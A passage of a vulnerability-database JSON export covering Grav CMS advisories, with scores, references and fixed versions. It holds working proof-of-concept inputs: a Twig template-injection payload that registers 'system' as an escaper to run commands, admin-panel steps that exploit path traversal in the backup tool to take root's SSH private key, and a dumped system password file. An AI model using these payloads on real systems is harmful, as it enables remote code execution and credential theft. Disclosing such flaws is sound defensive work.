_lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _scsd:*:31:31:Service Configuration Service:/var/empty:/usr/bin/false _ces:*:32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false _appstore:*:33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _appleevents:*:55:55:AppleEvents Daemon:/var/empty:/usr/bin/false _geod:*:56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false _devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _softwareupdate:*:200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false _coreaudiod:*:202:202:Core Audio Daemon:/var/empty:/usr/bin/false _screensaver:*:203:203:Screensaver:/var/empty:/usr/bin/false _locationd:*:205:205:Location Daemon:/var/db/locationd:/usr/bin/false _trustevaluationagent:*:208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false _timezone:*:210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false _lda:*:211:211:Local Delivery Agent:/var/empty:/usr/bin/false _cvmsroot:*:212:212:CVMS Root:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _dovecot:*:214:6:Dovecot Administrator:/var/empty:/usr/bin/false _dpaudio:*:215:215:DP Audio:/var/empty:/usr/bin/false _postgres:*:216:216:PostgreSQL Server:/var/empty:/usr/bin/false _krbtgt:*:217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _kadmin_admin:*:218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false _kadmin_changepw:*:219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false _devicemgr:*:220:220:Device Management Server:/var/empty:/usr/bin/false _webauthserver:*:221:221:Web Auth Server:/var/empty:/usr/bin/false _netbios:*:222:222:NetBIOS:/var/empty:/usr/bin/false _warmd:*:224:224:Warm Daemon:/var/empty:/usr/bin/false _dovenull:*:227:227:Dovecot Authentication:/var/empty:/usr/bin/false _netstatistics:*:228:228:Network Statistics Daemon:/var/empty:/usr/bin/false _avbdeviced:*:229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false _krb_krbtgt:*:230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _krb_kadmin:*:231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false _krb_changepw:*:232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false _krb_kerberos:*:233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false _krb_anonymous:*:234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false _assetcache:*:235:235:Asset Cache Service:/var/empty:/usr/bin/false _coremediaiod:*:236:236:Core Media IO Daemon:/var/empty:/usr/bin/false _launchservicesd:*:239:239:_launchservicesd:/var/empty:/usr/bin/false _iconservices:*:240:240:IconServices:/var/empty:/usr/bin/false _distnote:*:241:241:DistNote:/var/empty:/usr/bin/false _nsurlsessiond:*:242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false _displaypolicyd:*:244:244:Display Policy Daemon:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _krbfast:*:246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false _gamecontrollerd:*:247:247:Game Controller Daemon:/var/empty:/usr/bin/false _mbsetupuser:*:248:248:Setup User:/var/setup:/bin/bash _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _xserverdocs:*:251:251:macOS Server Documents Service:/var/empty:/usr/bin/false _wwwproxy:*:252:252:WWW Proxy:/var/empty:/usr/bin/false _mobileasset:*:253:253:MobileAsset User:/var/ma:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _ctkd:*:259:259:ctkd Account:/var/empty:/usr/bin/false _applepay:*:260:260:applepay Account:/var/db/applepay:/usr/bin/false _hidd:*:261:261:HID Service User:/var/db/hidd:/usr/bin/false _cmiodalassistants:*:262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _fpsd:*:265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _nearbyd:*:268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _appinstalld:*:273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false _installcoordinationd:*:274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false _demod:*:275:275:Demo Daemon:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/db/coreml:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false _avphidbridge:*:288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false _biome:*:289:289:Biome:/var/db/biome:/usr/bin/false _backgroundassets:*:291:291:Background Assets Service:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false\n```\n\n#### PoC Video\n- [PoC Video](https://drive.google.com/file/d/1wsmv7abdGc8WdYLNPPC5GrFcybhCORf2/view?usp=sharing)\n\n### Impact\nRemote Command Execution (RCE) is possible.\n\n### Occurrences\n- https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\n\n### References\n- [PortSwigger: Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)\n- [HackTricks: SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34251","reference_id":"","reference_type":"","scores":[{"value":"0.02554","scoring_system":"epss","scoring_elements":"0.85747","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34251"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"}],"url":"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34251","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34251"},{"reference_url":"https://github.com/advisories/GHSA-f9jf-4cp4-4fq5","reference_id":"GHSA-f9jf-4cp4-4fq5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f9jf-4cp4-4fq5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"}],"aliases":["CVE-2023-34251","GHSA-f9jf-4cp4-4fq5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rs42-h8k4-zydz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11471?format=json","vulnerability_id":"VCID-rurt-s65k-1yfk","summary":"Server Side Template Injection (SSTI) via Twig escape handler\n### Summary\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands.\n\n### Details\nhttps://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99\n```php\n/**\n * Defines a new escaper to be used via the escape filter.\n *\n * @param string $strategy The strategy name that should be used as a strategy in the escape call\n * @param callable $callable A valid PHP callable\n */\n public function setEscaper($strategy, callable $callable)\n {\n $this->escapers[$strategy] = $callable;\n }\n ```\n Twig supports the functionality to redefine the escape function through the setEscaper method. \nHowever, that method is not originally exposed to the twig environment, but it is accessible through the payload below.\n\n```plaintext\n{{ grav.twig.twig.extensions.core.setEscaper('a','a') }}\n```\nAt this point, it accepts callable type as an argument, but as there is no validation for the $callable variable, attackers can set dangerous functions like system as the escaper function.\n\n\n### PoC\n```\n{{ var_dump(grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter')) }}\n{{ var_dump(['id'] | escape('system', 'system')) }}\n```\n\n### Impact\nTwig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.\nAs the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28119","reference_id":"","reference_type":"","scores":[{"value":"0.01406","scoring_system":"epss","scoring_elements":"0.80779","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28119"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"}],"url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58"},{"reference_url":"https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"}],"url":"https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28119","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28119"},{"reference_url":"https://github.com/advisories/GHSA-2m7x-c7px-hp58","reference_id":"GHSA-2m7x-c7px-hp58","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2m7x-c7px-hp58"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28119","GHSA-2m7x-c7px-hp58"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rurt-s65k-1yfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30087?format=json","vulnerability_id":"VCID-swcx-dmqn-2yf9","summary":"Grav vulnerable to Path Traversal allowing server files backup\n### Summary\n```\nA path traversal vulnerability has been identified in Grav CMS, versions 1.7.49.5 , allowing authenticated attackers\n with administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due\n to insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling\n access to files outside the intended webroot directory. The impact of this vulnerability depends on the privileges of \nthe user account running the application.\n```\n\n### PoC\n```\nTo accurately demonstrate the maximum potential impact of this vulnerability, the testing environment was configured in a specific way:\n\n- Elevated Privileges: The application was run locally with the highest possible system privileges, operating under the **`root`** user account.\n \n- Objective: This configuration was chosen to unequivocally show that the path traversal vulnerability is not just a theoretical issue but can lead to a complete compromise of the underlying host when combined with poor operational practices. The ability to read any file on the system is the ultimate test of the flaw's severity.\n \n\nProof of Concept Goal: Under these conditions, the subsequent PoC will exploit the vulnerability to read the SSH private key\n of the `root` user (`/root/.ssh/id_rsa`). The successful exfiltration of this key represents a worst-case scenario, as it would provide \nan attacker with persistent, undetectable, and complete administrative access to the host server. This highlights the critical intersection\n of an application-layer vulnerability and a infrastructure-level misconfiguration.\n\n```\n\n\n\n\n```\n1- LOGIN AS ADMIN AND GO TO : http://127.0.0.1/admin/tools/backups\n2- Change 'Root Folder' to backup directory /../../../../../../../root/.ssh/ \n\n```\n<img width=\"1902\" height=\"492\" alt=\"Screenshot 2025-09-11 161519\" src=\"https://github.com/user-attachments/assets/23a60dc3-7758-4e24-b910-e66a1dd1f5e2\" />\n\n\n\n```\n3- CLICK : 'SAVE'\n4- CLICK : 'Backup Now'\n```\n\n<img width=\"1916\" height=\"512\" alt=\"Screenshot 2025-09-11 154151\" src=\"https://github.com/user-attachments/assets/88a63ff2-777e-467e-857b-0644ef698499\" />\n\n```\n5- Extract Backup :\n```\n\n\n<img width=\"704\" height=\"101\" alt=\"Screenshot 2025-09-11 160114\" src=\"https://github.com/user-attachments/assets/b91ce4db-9843-4280-b8f0-32c73aa12d4d\" />\n<img width=\"567\" height=\"101\" alt=\"Screenshot 2025-09-11 160135\" src=\"https://github.com/user-attachments/assets/155ce7d8-c2fc-4b54-b054-f7c7550bec82\" />","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66302","reference_id":"","reference_type":"","scores":[{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.20137","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66302"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/"}],"url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66302","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66302"},{"reference_url":"https://github.com/advisories/GHSA-j422-qmxp-hv94","reference_id":"GHSA-j422-qmxp-hv94","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j422-qmxp-hv94"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66302","GHSA-j422-qmxp-hv94"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-swcx-dmqn-2yf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29801?format=json","vulnerability_id":"VCID-t3bt-hrw2-jya3","summary":"Grav is Vulnerable to Security Sandbox Bypass with SSTI (Server Side Template Injection)\n## Summary\n\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox.\n\n## Details\n\nGrav CMS uses a custom sandbox to protect the powerful Twig methods such as `registerUndefinedFilterCallback()`. These methods are designed to prevent SSTI attacks by denying the execution of dangerous PHP functions (e.g., `exec()`, `passthru()`, `system()`, etc.) within Twig template directives.\n\nThe current defense mechanism relies on a blacklist of prohibited functions (PHP, Twig), checked through the `isDangerousFunction()` method in the file `system/src/Grav/Common/Twig.php`:\n\n```php\n$this->twig->registerUndefinedFilterCallback(function (string $name) use ($config) {\n $allowed = $config->get('system.twig.safe_filters');\n if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {\n return new TwigFilter($name, $name);\n }\n if ($config->get('system.twig.undefined_filters')) {\n if (function_exists($name)) {\n if (!Utils::isDangerousFunction($name)) {\n user_error(\"PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`\", E_USER_DEPRECATED);\n\n return new TwigFilter($name, $name);\n }\n\n /** @var Debugger $debugger */\n $debugger = $this->grav['debugger'];\n $debugger->addException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig filter. If you really want to use it, please add it to system configuration: `system.twig.safe_filters`\"));\n }\n\n return new TwigFilter($name, static function () {});\n }\n\n return false;\n});\n```\n\nIn this code, the `isDangerousFunction()` check is bypassed if the filter defined in the $name variable is considered safe. Only an administrator can mark a function as safe by adding it to the `system.twig.safe_filters` configuration properties (whitelists that are empty by default) in the `system/config/system.yaml` file.\n\nNotably, the Twig class is defined within the `system/src/Grav/Common/Twig.php` file, and the Twig object (and environment) is instantiated there:\n\n```php\n/**\n * Class Twig\n * @package Grav\\Common\\Twig\n */\nclass Twig\n{\n 